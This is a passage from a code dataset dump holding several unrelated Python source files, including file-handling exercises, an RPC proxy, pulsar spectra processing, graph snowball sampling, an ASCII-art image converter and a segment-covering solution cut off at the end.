=f.read()\n print(contents)\n #or, readlines reads the individual line into a list\n #fl =f.readlines()\n #for x in fl:\n #print x\n f.close()\nif __name__== \"__main__\":\n main()\n \n#Open a file in append mode.\nf= open(\"filedemo13112019demo.txt\",\"a\")\nprint(f) \nf.write('I am learning python\\n')\nf.write('python is easy to learn\\n')\nf.close()\n \n#file in write mode.\nf= open(\"filedemo13112019demo.txt\",\"w\") \nf.write('I am learning python\\n')\nf.write('python is easy to learn\\n')\nf.close()\n\n#Reading a file r mode.\nf= open(\"filedemo13112019demo.txt\",\"r\") \nprint(f.read())\nf.close()\n\n#Reading line by line\nf= open(\"filedemo13112019demo.txt\",\"r\") \nlines = f.readlines()\nfor l in lines:\n print(l)\nf.close()\n\n#Sum of numbers in a file\nf= open(\"samplefile.txt\",\"r\") \nlines = f.readlines()\ntokens = ''\nsum = 0\nfor l in lines:\n tokens = l.split()\n for token in tokens:\n if (token.isnumeric()):\n sum = sum + int(token)\n print(token) \nprint('sum : ',sum)\nf.close()\n\n#https://www.tutorialsteacher.com/python/python-read-write-file\nf= open(\"dhanyatest1.txt\",\"a+\")\nf.write('testing')\nf.seek(0,0)\ncontents =f.read()\nprint(contents)\nprint(f.mode)\nf.close()\n\nf=open(\"binfile.bin\",\"w+b\")\nnum=[5, 10, 15, 20, 25]\narr=bytearray(num)\nf.write(arr)\nf.seek(0,0)\nprint(list(f.read()))\nf.close()\nf=open(\"binfile.bin\",\"w+b\")\nnum=['r', 'a']\narr=bytearray(str(num),'utf-8')\nf.write(arr)\nf.seek(0,0)\nprint((f.read().decode()))\nf.close()\n\nstring = \"Python is interesting.\"\n# string with encoding 'utf-8'\narr = bytearray(string, 'utf-8')\nprint(arr)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"15-FileManagement.py","file_name":"15-FileManagement.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"169757995","text":"#-*-coding: utf-8-*-\n\n# Version: 0.1\n# Author: Don Li \n# License: Copyright(c) 2015 Don.Li\n# Summary:\n\nfrom rpc import route\nfrom enum import Enum\nfrom errorno import *\n\nfrom log import log\nfrom protocol_manager import g_protoMgr, gs_call, ms_call, alli_call\n\nimport traceback\n\nclass RoutePrefix(Enum):\n CHAT = 'chat'\n MAIL = 'mail'\n ALLIANCE = 'alliance'\n\n@route(msgid='*')\nasync def proxy(p, request):\n res = [UNKNOWN_ERROR, None]\n\n log.debug('request: {0}, p: {1}.'.format( request, p ))\n if p.cid is None:\n res[0] = LOGIN_UNKNOWN_CID\n log.warn('[ proxy ]unknown cid.', request, 'FROM:', p.Peer())\n return res\n else:\n _func, _request = request\n if _request:\n _request = p.cid, _request\n else:\n _request = (p.cid, )\n\n _prefix = _func.split('_')[0]\n\n if _prefix == RoutePrefix.CHAT.value:\n _call = ms_call\n elif _prefix == RoutePrefix.MAIL.value:\n _call = ms_call\n elif _prefix == RoutePrefix.ALLIANCE.value:\n _call = alli_call\n else:\n _call = gs_call\n\n try:\n remote_res = await _call( _func, _request )\n except Exception as e:\n log.error('e: {0}, request: {1}.'.format( e, request ))\n traceback.print_exc()\n return res\n\n if isinstance(remote_res, int):\n res[0] = remote_res\n return res\n else:\n res[0] = NO_ERROR\n res[1] = remote_res\n return res\n\n","sub_path":"src/gateway/handler/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"166422137","text":"from numpy import *\nfrom scipy.signal import find_peaks\n\n# This is a modified version of the curve_is_fine routine used for the\n# drift velocities. Unlike its predecessor, it also returns the height of\n# the peak in case there is one, and returns the approximated level of the\n# noise in case no peak was found (not unique peak, just if no peak was found\n# at all, i.e. the signal is 'zero').\n\ndef curve_is_fine(curve):\n # Testing sizes\n #if min(curve) > noise_treshhold:\n # return False\n if min(curve) < -0.499:\n return False, -1\n\n # Now we know that the curve has the right size.\n\n # Now, we check if it has the right shape; for that,\n # it is enough to check that it has exactly one peak.\n\n min_size = min(curve) # This gives us the lowest point of the curve\n noise_estimate = min(curve[:50]) # This gives an extremely rough estimate\n # of the background noise. More is not needed though\n\n # The following few lines had to be added, since otherwise null-signals\n # would not make it through\n if abs(min_size) <= 0.02:\n return True, 0\n\n # In case the voltage due to background on the right is\n # higher than on the left, we need to take this into account for\n # the prominence.\n noise_estimate_right = curve[-1]\n\n prominence_approx = min(abs(min_size - noise_estimate), abs(min_size - noise_estimate_right))\n \n # Now, if we search for peaks with this prominence, we'll find\n # just the highest peak. But we want to be sure that they are no\n # other significant peaks. For this, we search for all peaks that\n # have a significant prominance compared to the main peak.\n # This is a bit arbitrary, but a secondary peak will have a prominence\n # of about 1/10 of the main peak. The rest will be noise, whose\n # prominence is far lower.\n significance = 10.0\n peaks, _ = find_peaks(-curve, prominence = (prominence_approx/significance, None), distance = 50)\n # The function has to be flipped, as find_peaks only\n # searches for local maxima\n if peaks.shape[0] > 1:\n return False, -1\n elif peaks.shape[0] == 0:\n return True, 0\n elif peaks.shape[0] == 1:\n return True, abs(min_size) - abs(noise_estimate)\n return False, -1\n","sub_path":"Drift_Chamber_Analysis/Computing_Gas_Amplification_channel_wise/curve_is_fine_gas_amplification.py","file_name":"curve_is_fine_gas_amplification.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"65229856","text":"# based on the 2020 tax rates for someone filing single\r\n# https://www.nerdwallet.com/article/taxes/federal-income-tax-brackets\r\ndef tax():\r\n rates = [.10, .12, .22, .24, .32, .35, .37]\r\n income_cutoff = [9875, 40125, 85525, 163300, 207350, 518400]\r\n income = float(input(\"Enter your annual income: \"))\r\n\r\n if income <= 9875:\r\n tax_owed = float(income) * rates[0]\r\n print(float(tax_owed))\r\n elif income > 9876 and income < 40125:\r\n tax_owed = (987.5 + (rates[1]*(float(income) - income_cutoff[0])))\r\n print(float(tax_owed))\r\n elif income > 40126 and income < 85525:\r\n tax_owed = (4617.5 + (rates[2]*(float(income) - income_cutoff[1])))\r\n print(float(tax_owed))\r\n elif income > 85526 and income < 163300:\r\n tax_owed = (14605.5 + (rates[3]*(float(income) - income_cutoff[2])))\r\n print(float(tax_owed))\r\n elif income > 163301 and income < 207350:\r\n tax_owed = (33271.5 + (rates[4]*(float(income) - income_cutoff[3])))\r\n print(float(tax_owed))\r\n elif income > 207351 and income < 518400:\r\n tax_owed = (47367.5 + (rates[5]*(float(income) - income_cutoff[4])))\r\n print(float(tax_owed))\r\n elif income > 518401:\r\n tax_owed = (156235 + (rates[6]*(float(income) - income_cutoff[5])))\r\n print(float(tax_owed))\r\n\r\ntax()\r\n","sub_path":"Income Tax Calculator.py","file_name":"Income Tax Calculator.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"19964166","text":"\r\n\r\nmenu = ['1. 회원가입', '2. 로그인', '3. 회원목록', '9. 메뉴종료']\r\nmenuChk = ['1','2','3','9']\r\nitemList = ['ID', 'PWD', 'NAME', 'EMAIL', 'PHONE', 'ADDRESS']\r\n\r\n\r\nuser_check = []\r\n\r\nprint('='*20, \" 메뉴선택 \", '='*20, end='\\n\\n')\r\nfor x in range(4):\r\n\tprint(menu[x], \" \", end='')\r\nprint(end= '\\n\\n')\r\nprint('='*52)\r\n\r\nwhile True:\r\n\tnumber = input(\"\\t메뉴의 번호를 선택해주세요.\t\")\r\n\tif number == '':\r\n\t\tprint()\r\n\t\tprint('숫자 확인하세요.')\r\n\t\tcontinue\r\n\tif number != '':\r\n\t\tnumber = int(number)\r\n\tif number == 9:\r\n\t\tprint('종료합니다.')\r\n\t\tbreak\r\n\tif number not in range(1,4):\r\n\t\tprint()\r\n\t\tprint('숫자 확인하세요.', end='\\n\\n')\r\n\t\tcontinue\r\n\telse:\r\n\t\tuser_list = []\r\n\t\tfor y in range(1):\r\n\t\t\tif number == 1:\r\n\t\t\t\tprint(end='\\n\\n')\r\n\t\t\t\tprint(\"\\tSign Up\", end='\\n\\n')\r\n\t\t\t\tfor z in range(6):\r\n\t\t\t\t\tchu = input('\\t' + itemList[z] + '\\t:\\t')\r\n\t\t\t\t\tuser_list.append(chu)\r\n#\t\t\t\tprint(user_list)\r\n\t\t\t\tuser_check.append(user_list)\r\n\t\t\t\tusers = int(len(user_check))\r\n\t\t\t\tprint()\r\n#\t\t\t\tprint('\\t', user_check, end = '\\n')\r\n#\t\t\t\tprint('\\t현재 회원 수는 %d명 입니다.' %users)\r\n\r\n\t\t\t\tfor i in range(users):\r\n\t\t\t\t\tprint('\\t', user_check[i])\r\n\t\t\t\tprint('\\t현재 회원 수는 %d명 입니다.' %users, end='\\n\\n')\r\n\r\n\r\n\r\n\r\n\t\r\n\r\n","sub_path":"Python&DataBase/5.17/final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"488263979","text":"#!/usr/bin/env python\n#\n# Based on spectra.py in PRESTO\n\n\nimport copy\n\nimport numpy as np\nimport scipy.signal\n\n\n# Adapted from psr_utils\ndef rotate(arr, bins):\n \"\"\"\n Return an array rotated by 'bins' places to the left\n\n :param list arr: Input data\n :param int bins: Number of bins to rotate by\n \"\"\"\n bins = bins % len(arr)\n if bins == 0:\n return arr\n else:\n return np.concatenate((arr[bins:], arr[:bins]))\n\n\n# Adapted from psr_utils\ndef delay_from_DM(DM, freq_emitted):\n \"\"\"\n Return the delay in seconds caused by dispersion, given\n a Dispersion Measure in cm-3 pc, and the emitted\n frequency of the pulsar in MHz.\n\n :param float DM: dispersion measure\n :param float freq_emitted: frequency\n \"\"\"\n if isinstance(freq_emitted, float):\n if freq_emitted > 0.0:\n return DM / (0.000241 * freq_emitted * freq_emitted)\n else:\n return 0.0\n else:\n return np.where(freq_emitted > 0.0,\n DM / (0.000241 * freq_emitted * freq_emitted), 0.0)\n\n\nclass Spectra:\n \"\"\"\n A class to store spectra. This is mainly to provide\n reusable functionality.\n \"\"\"\n def __init__(self, freqs, dt, data, starttime=0, dm=0):\n \"\"\"\n Spectra constructor\n\n :param list freqs: Observing frequencies for each channel.\n :param float dt: Sampling time (seconds)\n :param array data: A 2D numpy array containing pulsar data.\n Axis 0 should contain channels. (e.g. data[0,:])\n Axis 1 should contain spectra. (e.g. data[:,0])\n :param float starttime: Start time (in seconds) of the spectra\n with respect to the start of the observation.\n (Default: 0).\n :param float dm: Dispersion measure (in pc/cm^3). (Default: 0)\n :return: Spectra object\n \"\"\"\n self.numchans, self.numspectra = data.shape\n assert len(freqs) == self.numchans\n\n self.freqs = freqs\n self.data = data.astype('float')\n self.dt = dt\n self.starttime = starttime\n self.dm = 0\n\n def __str__(self):\n return str(self.data)\n\n def __getitem__(self, key):\n return self.data[key]\n\n def __setitem__(self, key, value):\n self.data[key] = value\n\n def get_chan(self, channum):\n return self.data[channum, :]\n\n def get_spectrum(self, specnum):\n return self.data[:, specnum]\n\n def shift_channels(self, bins, padval=0):\n \"\"\"\n Shift each channel to the left by the corresponding\n value in bins, an array.\n *** Shifting happens in-place ***\n\n :param array bins: An array containing the number of bins\n to shift each channel by.\n :param float/str padval: Value to use when shifting near the edge\n of a channel. This can be a numeric value,\n 'median', 'mean', or 'rotate'.\n\n The values 'median' and 'mean' refer to the\n median and mean of the channel. The value\n 'rotate' takes values from one end of the\n channel and shifts them to the other.\n \"\"\"\n assert self.numchans == len(bins)\n for ii in range(self.numchans):\n chan = self.get_chan(ii)\n # Use 'chan[:]' so update happens in-place\n # this way the change effects self.data\n chan[:] = rotate(chan, bins[ii])\n if padval != 'rotate':\n # Get padding value\n if padval == 'mean':\n pad = np.mean(chan)\n elif padval == 'median':\n pad = np.median(chan)\n else:\n pad = padval\n\n # Replace rotated values with padval\n if bins[ii] > 0:\n chan[-bins[ii]:] = pad\n elif bins[ii] < 0:\n chan[:-bins[ii]] = pad\n\n def subband(self, nsub, subdm=None, padval=0):\n \"\"\"\n Reduce the number of channels to 'nsub' by subbanding.\n The channels within a subband are combined using the\n DM 'subdm'. 'padval' is passed to the call to\n 'Spectra.shift_channels'.\n *** Subbanding happens in-place ***\n\n :param int nsub: Number of subbands. Must be a factor of\n the number of channels.\n :param float subdm: The DM with which to combine channels within\n each subband (Default: don't shift channels\n within each subband)\n :param float/str padval: The padding value to use when shifting\n channels during dedispersion. See documentation\n of Spectra.shift_channels. (Default: 0)\n \"\"\"\n assert (self.numchans % nsub) == 0\n assert (subdm is None) or (subdm >= 0)\n nchan_per_sub = self.numchans / nsub\n sub_hifreqs = self.freqs[np.arange(int(nsub)) * int(nchan_per_sub)]\n sub_lofreqs = self.freqs[(1 + np.arange(int(nsub))) * int(nchan_per_sub - 1)]\n sub_ctrfreqs = 0.5 * (sub_hifreqs + sub_lofreqs)\n\n if subdm is not None:\n # Compute delays\n ref_delays = delay_from_DM(subdm - self.dm, sub_ctrfreqs)\n delays = delay_from_DM(subdm - self.dm, self.freqs)\n rel_delays = delays - ref_delays.repeat(nchan_per_sub) # Relative delay\n rel_bindelays = np.round(rel_delays / self.dt).astype('int')\n # Shift channels\n self.shift_channels(rel_bindelays, padval)\n\n # Subband\n self.data = np.array([np.sum(sub, axis=0) for sub in\n np.vsplit(self.data, nsub)])\n self.freqs = sub_ctrfreqs\n self.numchans = nsub\n\n def scaled(self, indep=False):\n \"\"\"\n Return a scaled version of the Spectra object.\n When scaling subtract the median from each channel,\n and divide by global std deviation (if indep==False), or\n divide by std deviation of each row (if indep==True).\n\n :param bool indep: If True, scale each row\n independently (Default: False).\n\n :return: scaled_spectra: A scaled version of the\n Spectra object.\n \"\"\"\n other = copy.deepcopy(self)\n if not indep:\n std = other.data.std()\n for ii in range(other.numchans):\n chan = other.get_chan(ii)\n median = np.median(chan)\n if indep:\n std = chan.std()\n chan[:] = (chan - median) / std\n return other\n\n def scaled2(self, indep=False):\n \"\"\"\n Return a scaled version of the Spectra object.\n When scaling subtract the min from each channel,\n and divide by global max (if indep==False), or\n divide by max of each row (if indep==True).\n\n :param bool indep: If True, scale each row\n independently (Default: False).\n\n :return: scaled_spectra: A scaled version of the\n Spectra object.\n \"\"\"\n other = copy.deepcopy(self)\n if not indep:\n max = other.data.max()\n for ii in range(other.numchans):\n chan = other.get_chan(ii)\n min = chan.min()\n if indep:\n max = chan.max()\n chan[:] = (chan - min) / max\n return other\n\n def masked(self, mask, maskval='median-mid80'):\n \"\"\"\n Replace masked data with 'maskval'. Returns\n a masked copy of the Spectra object.\n\n :param array mask: An array of boolean values of the same size and shape\n as self.data. True represents an entry to be masked.\n :param str maskval: Value to use when masking. This can be a numeric\n value, 'median', 'mean', or 'median-mid80'.\n\n The values 'median' and 'mean' refer to the median and\n mean of the channel, respectively. The value 'median-mid80'\n refers to the median of the channel after the top and bottom\n 10% of the sorted channel is removed.\n (Default: 'median-mid80')\n\n :return: maskedspec: A masked version of the Spectra object.\n \"\"\"\n assert self.data.shape == mask.shape\n maskvals = np.ones(self.numchans)\n for ii in range(self.numchans):\n chan = self.get_chan(ii)\n # Use 'chan[:]' so update happens in-place\n if maskval == 'mean':\n maskvals[ii] = np.mean(chan)\n elif maskval == 'median':\n maskvals[ii] = np.median(chan)\n elif maskval == 'median-mid80':\n n = int(np.round(0.1 * self.numspectra))\n maskvals[ii] = np.median(sorted(chan)[n:-n])\n else:\n maskvals[ii] = maskval\n if np.all(mask[ii]):\n self.data[ii] = np.ones_like(self.data[ii]) * (maskvals[:, np.newaxis][ii])\n return self\n\n def dedisperse(self, dm=0, padval=0):\n \"\"\"\n Shift channels according to the delays predicted by\n the given DM.\n *** Dedispersion happens in place ***\n\n :param float dm: The DM (in pc/cm^3) to use.\n :param float/str padval: The padding value to use when shifting\n channels during dedispersion. See documentation\n of Spectra.shift_channels. (Default: 0)\n \"\"\"\n assert dm >= 0\n ref_delay = delay_from_DM(dm - self.dm, np.max(self.freqs))\n delays = delay_from_DM(dm - self.dm, self.freqs)\n rel_delays = delays - ref_delay # Relative delay\n rel_bindelays = np.round(rel_delays / self.dt).astype('int')\n # Shift channels\n self.shift_channels(rel_bindelays, padval)\n\n self.dm = dm\n\n def smooth(self, width=1, padval=0):\n \"\"\"\n Smooth each channel by convolving with a top hat\n of given width. The height of the top had is\n chosen shuch that RMS=1 after smoothing.\n Overlap values are determined by 'padval'.\n This bit of code is taken from Scott Ransom's\n PRESTO's single_pulse_search.py (line ~ 423).\n *** Smoothing is done in place. ***\n\n :param int width: Number of bins to smooth by (Default: no smoothing)\n :param float/str padval: Padding value to use. Possible values are\n float-value, 'mean', 'median', 'wrap'.\n (Default: 0).\n \"\"\"\n if width > 1:\n kernel = np.ones(width, dtype='float32') / np.sqrt(width)\n for ii in range(self.numchans):\n chan = self.get_chan(ii)\n if padval == 'wrap':\n tosmooth = np.concatenate([chan[-width:],\n chan, chan[:width]])\n elif padval == 'mean':\n tosmooth = np.ones(self.numspectra + width * 2) * \\\n np.mean(chan)\n tosmooth[width:-width] = chan\n elif padval == 'median':\n tosmooth = np.ones(self.numspectra + width * 2) * \\\n np.median(chan)\n tosmooth[width:-width] = chan\n else: # padval is a float\n tosmooth = np.ones(self.numspectra + width * 2) * \\\n padval\n tosmooth[width:-width] = chan\n\n smoothed = scipy.signal.convolve(tosmooth, kernel, 'same')\n chan[:] = smoothed[width:-width]\n\n def trim(self, bins=0):\n \"\"\"\n Trim the end of the data by 'bins' spectra.\n *** Trimming is done in place ***\n\n :param int bins: Number of spectra to trim off the end of the observation.\n If bins is negative trim spectra off the beginning of the\n observation.\n \"\"\"\n assert bins < self.numspectra\n if bins == 0:\n return\n elif bins > 0:\n self.data = self.data[:, :-bins]\n self.numspectra = self.numspectra - bins\n elif bins < 0:\n self.data = self.data[:, bins:]\n self.numspectra = self.numspectra - bins\n self.starttime = self.starttime + bins * self.dt\n\n def downsample(self, factor=1, trim=True):\n \"\"\"\n Downsample the spectra by co-adding\n 'factor' adjacent bins.\n *** Downsampling is done in place ***\n\n :param int factor: Reduce the number of spectra by this\n factor. Must be a factor of the number of\n spectra if 'trim' is False.\n :param bool trim: Trim off excess bins.\n \"\"\"\n assert trim or not (self.numspectra % factor)\n new_num_spectra = self.numspectra // factor\n num_to_trim = int(self.numspectra % factor)\n self.trim(num_to_trim)\n self.data = np.array(np.column_stack([np.sum(subint, axis=1) for\n subint in np.hsplit(self.data, new_num_spectra)]))\n self.numspectra = new_num_spectra\n self.dt = self.dt * factor\n","sub_path":"arts_localisation/data_tools/spectra.py","file_name":"spectra.py","file_ext":"py","file_size_in_byte":13472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"301950971","text":"import json\r\nimport sys\r\nimport random\r\nimport math \r\nimport time\r\nimport networkx as nx\r\nimport matplotlib.pyplot as plt\r\nfrom collections import defaultdict\r\n\r\n\r\nclass Queue():\r\n #Constructor creates a list\r\n def __init__(self):\r\n self.queue = list()\r\n \r\n #Adding elements to queue\r\n def enqueue(self,data):\r\n #Checking to avoid duplicate entry (not mandatory)\r\n if data not in self.queue:\r\n self.queue.insert(0,data)\r\n return True\r\n return False\r\n \r\n #Removing the last element from the queue\r\n def dequeue(self):\r\n if len(self.queue)>0:\r\n return self.queue.pop()\r\n else:\r\n #plt.show()\r\n exit()\r\n \r\n #Getting the size of the queue\r\n def size(self):\r\n return len(self.queue)\r\n \r\n #printing the elements of the queue\r\n def printQueue(self):\r\n return self.queue\r\n\r\nclass Snowball():\r\n\r\n def __init__(self):\r\n self.G1 = nx.Graph()\r\n\r\n def snowball(self,G,size,k):\r\n q=Queue() \r\n list_nodes=list(G.nodes())\r\n m = k\r\n dictt = set()\r\n while(m):\r\n id = random.sample(list(G.nodes()),1)[0]\r\n q.enqueue(id)\r\n m = m - 1\r\n #print(q.printQueue())\r\n while(len(self.G1.nodes()) <= size):\r\n if(q.size() > 0):\r\n id = q.dequeue()\r\n self.G1.add_node(id)\r\n if(id not in dictt):\r\n dictt.add(id)\r\n list_neighbors = list(G.neighbors(id))\r\n if(len(list_neighbors) > k):\r\n for x in list_neighbors[:k]:\r\n q.enqueue(x)\r\n self.G1.add_edge(id,x)\r\n elif(len(list_neighbors) <= k and len(list_neighbors) > 0):\r\n for x in list_neighbors:\r\n q.enqueue(x)\r\n self.G1.add_edge(id,x)\r\n else:\r\n continue\r\n else:\r\n initial_nodes = random.sample(list(G.nodes()) and list(dictt),k)\r\n no_of_nodes = len(initial_nodes)\r\n for id in initial_nodes:\r\n q.enqueue(id) \r\n return self.G1\r\n\r\n\r\n","sub_path":"build/lib/Graph_Sampling/Snowball.py","file_name":"Snowball.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"276077843","text":"import utils_data\nimport numpy as np\nimport active_subspaces\n\n# Set quantity of interest and input labels\nQofI = 'QoI'\nin_labels = ['rho', 'mu', 'dpdz', 'c_p', 'k', 'Pr_t']\n\n# Set the number of parameter (m) and active subspace dimension (n)\nm, n = 6, 1\n\n# Load random sampling data\ndata = np.loadtxt('params_and_results.dat')\nX_phys, f, df_phys = data[:, :m], data[:, m].reshape((data.shape[0], 1)), data[:, m+1:]\nM = f.shape[0]\n\n# Scale data so parameters are in [-1, 1]\nX_norm, df_norm = utils_data.physical_to_normalized(X=X_phys, df=df_phys)\n\n###############################################################################\n##### Local Linear Approximation Gradients\n###############################################################################\n\n# Estimate gradients using local linear approximation\ndf_local_linear = active_subspaces.gradients.local_linear_gradients(X_phys, f)\n\n# Scale data so parameters are in [-1, 1]\ndf_local_linear = utils_data.physical_to_normalized(df=df_local_linear)\n\n# Compute the active/inactive subspaces\n# NOTE: The gradient is normalized for this computation\nsub = active_subspaces.subspaces.Subspaces()\nsub.compute(df_local_linear/np.linalg.norm(df_local_linear, axis=1).reshape((df_local_linear.shape[0], 1)))\n\n# Rewrite the active/inactive subspace variables to be n-dimensional\nsub.W1, sub.W2 = sub.eigenvectors[:, :n], sub.eigenvectors[:, n:]\nsub.W1 = sub.W1.reshape(m, n)\nsub.W2 = sub.W2.reshape(m, m-n)\n\n# Define the active/inactive variables\nY, Z = np.dot(X_norm, sub.W1), np.dot(X_norm, sub.W2)\n\n# Plot the active subspace info\nactive_subspaces.utils.plotters.eigenvalues(sub.eigenvalues, e_br=sub.e_br, out_label='Local Linear Approximation')\nactive_subspaces.utils.plotters.eigenvectors(sub.W1, in_labels=in_labels, out_label='Local Linear Approximation')\n\n###############################################################################\n##### True Gradients\n###############################################################################\n\n# Compute the active/inactive subspaces\n# NOTE: The gradient is normalized for this computation\nsub = active_subspaces.subspaces.Subspaces()\nsub.compute(df_norm/np.linalg.norm(df_norm, axis=1).reshape((M, 1)))\n\n# Rewrite the active/inactive subspace variables to be n-dimensional\nsub.W1, sub.W2 = sub.eigenvectors[:,:n], sub.eigenvectors[:,n:]\nsub.W1 = sub.W1.reshape(m, n)\nsub.W2 = sub.W2.reshape(m, m-n)\n\n# Define the active/inactive variables\nY, Z = np.dot(X_norm, sub.W1), np.dot(X_norm, sub.W2)\n\n# Plot the active subspace info\nactive_subspaces.utils.plotters.eigenvalues(sub.eigenvalues, e_br=sub.e_br, out_label='True')\nactive_subspaces.utils.plotters.eigenvectors(sub.W1, in_labels=in_labels, out_label='True')","sub_path":"active_subspaces/Matlab_Version/Python_Testing/Data_Set/test_script_gradients.py","file_name":"test_script_gradients.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"316901245","text":"\nfrom datetime import datetime\nfrom diofant import latex\n\n\ndef output_results(prog, invariants, computation_time, output_format=\" \"):\n program_name = prog.name\n timestamp = datetime.now().strftime('%y%m%d-%H%M%S%f')[:-4]\n if output_format == \"tex\" or output_format == \"latex\":\n with open(f\"out/{output_format}_{program_name}_{timestamp}\",\"a+\") as f:\n for k in invariants:\n if k:\n f.write(\"\\[E[{}] = {}\\]\\n\".format(latex(k.as_expr()), latex(invariants[k])))\n f.write(\"\\nComputation time {}s.\".format(computation_time))\n f.write(\"\\n\\n\")\n elif output_format == \"text\" or output_format == \"eval\" or output_format == \"exp\":\n with open(f\"out/{output_format}_{program_name}_{timestamp}\",\"a+\") as f:\n for k in invariants:\n if k:\n f.write(f\"\\nE[{k.as_expr()}] = {invariants[k]}\")\n f.write(f\"\\n\\nComputation time {computation_time}s.\")\n f.write(\"\\n\\n\")\n for k in invariants:\n if k:\n print(\" E[{}] = {}\".format(k.as_expr(), invariants[k]))\n print(\"Computation time {}s.\".format(computation_time))\n return [\" E[{}] = {}\".format(k.as_expr(), invariants[k]) for k in invariants if k]\n","sub_path":"mora/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"141218487","text":"from PIL import Image\r\nimport sys\r\nimport urllib.request\r\n#import urllib, cStringIO\r\nimport requests\r\n#im = Image.open(requests.get(url, stream=True).raw)\r\n\r\nASCII_CHARS = ['.',',',':',';','+','*','?','%','S','#','@']\r\n#ASCII_CHARS = ['..',',,','::',';;','++','**','??','%%','SS','##','@@']\r\nASCII_CHARS = ASCII_CHARS[::-1]\r\n\r\n\r\n'''\r\nmethod resize():\r\n - takes as parameters the image, and the final width\r\n - resizes the image into the final width while maintaining aspect ratio\r\n'''\r\ndef resize(image, new_width):\r\n (old_width, old_height) = image.size\r\n aspect_ratio = float(old_height)/float(old_width)\r\n new_height = int((aspect_ratio * new_width)/2)\r\n new_dim = (new_width, new_height)\r\n new_image = image.resize(new_dim)\r\n return new_image\r\n'''\r\nmethod grayscalify():\r\n - takes an image as a parameter\r\n - returns the grayscale version of image\r\n'''\r\ndef grayscalify(image):\r\n return image.convert('L')\r\n\r\n'''\r\nmethod modify():\r\n - replaces every pixel with a character whose intensity is similar\r\n'''\r\ndef modify(image, buckets=25):\r\n initial_pixels = list(image.getdata())\r\n new_pixels = [ASCII_CHARS[pixel_value//buckets] for pixel_value in initial_pixels]\r\n return ''.join(new_pixels)\r\n\r\n'''\r\nmethod do():\r\n - does all the work by calling all the above functions\r\n'''\r\ndef do(image, new_width):\r\n image = resize(image,new_width)\r\n image = grayscalify(image)\r\n\r\n pixels = modify(image)\r\n len_pixels = len(pixels)\r\n\r\n # Construct the image from the character list\r\n new_image = [pixels[index:index+new_width] for index in range(0, len_pixels, new_width)]\r\n\r\n return '\\n'.join(new_image)\r\n\r\n'''\r\nmethod runner():\r\n - takes as parameter the image path and runs the above code\r\n - handles exceptions as well\r\n - provides alternative output options\r\n'''\r\ndef Asciify(path,newSize):\r\n image = None\r\n IMG=None\r\n try:\r\n image = Image.open(path)\r\n except:\r\n try:\r\n urllib.request.urlretrieve(path, 'a.'+path[-3:])\r\n image = Image.open('a.png')\r\n except:\r\n try:\r\n image = Image.open(requests.get(path, stream=True).raw)\r\n except:\r\n print(\"Unable to find image in\",path)\r\n #print(e)\r\n return\r\n image = do(image,newSize)\r\n return(image)\r\n\r\n\r\n\r\ndef asciify(path,newSize):\r\n IMG=None\r\n image = None\r\n try:\r\n image = Image.open(path)\r\n except:\r\n try:\r\n urllib.request.urlretrieve(path, 'a.'+path[-3:])\r\n image = Image.open('a.png')\r\n except:\r\n try:\r\n image = Image.open(requests.get(path, stream=True).raw)\r\n except:\r\n print(\"Unable to find image in\",path)\r\n #print(e)\r\n return\r\n image = do(image,newSize)\r\n print(image)\r\ndef Version():\r\n return('Current-2021-07-28')\r\n","sub_path":"asciify.py","file_name":"asciify.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"56882268","text":"# Uses python3\nimport sys\nfrom collections import namedtuple\nimport operator\n\nSegment = namedtuple('Segment', 'start end')\n\ndef optimal_points(segments):\n points = []\n full_segments = []\n #write your code here\n segments.sort(key=operator.itemgetter(0))\n\n '''\n for s in segments:\n sub_segment = []\n value = s.start\n while value <= s.end:\n sub_segment.append(value)\n value += 1\n full_segments.append(sub_segment)\n\n full_segments.sort(key=operator.itemgetter(0))\n \n '''\n\n header = []\n hdr_header = []\n for cur, nxt in zip(segments, segments[1:]):\n # check common elements still connect segments. If not choose one and store\n if not header:\n for elem in cur:\n if elem in nxt:\n header.append(elem)\n if not header:\n points.append(max(cur))\n\n else:\n for h in header:\n if h in nxt:\n hdr_header.append(h)\n\n if hdr_header:\n header = hdr_header[:]\n hdr_header = []\n else:\n points.append(max(header))\n header = []\n\n # get common elements cur and next, store in header\n # process last segment\n if header:\n # last link\n points.append(max(header))\n else:\n # no link, last segment on its own\n points.append(max(nxt))\n\n #points.sort()\n\n return points\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n n, *data = map(int, input.split())\n segments = list(map(lambda x: Segment(x[0], x[1]), zip(data[::2], data[1::2])))\n points = optimal_points(segments)\n print(len(points))\n for p in points:\n print(p, end=' ')\n\n# 3 1 3 2 5 3 6 = 1 3\n# 4 4 7 1 3 2 5 5 6 = 2 3 6\n\n#\n\n# = 43\n# 1 4 5 8 9 10 14 15 18 23 26 28 29 30 32 34 35 36 40 41 44 46 49 52 54 56 58 61 62 63 65 67 70 74 77 78 79 81 84 87 91 93 95\n# 1 4 8 10 14 18 23 26 29 32 34 35 36 40 41 44 49 52 54 58 63 65 67 70 74 78 79 81 84 87 91 93\n#M\n# 1 2 4 8 10 14 15 18 23 26 27 29 32 33 34 35 36 38 40 41 42 44 49 51 52 54 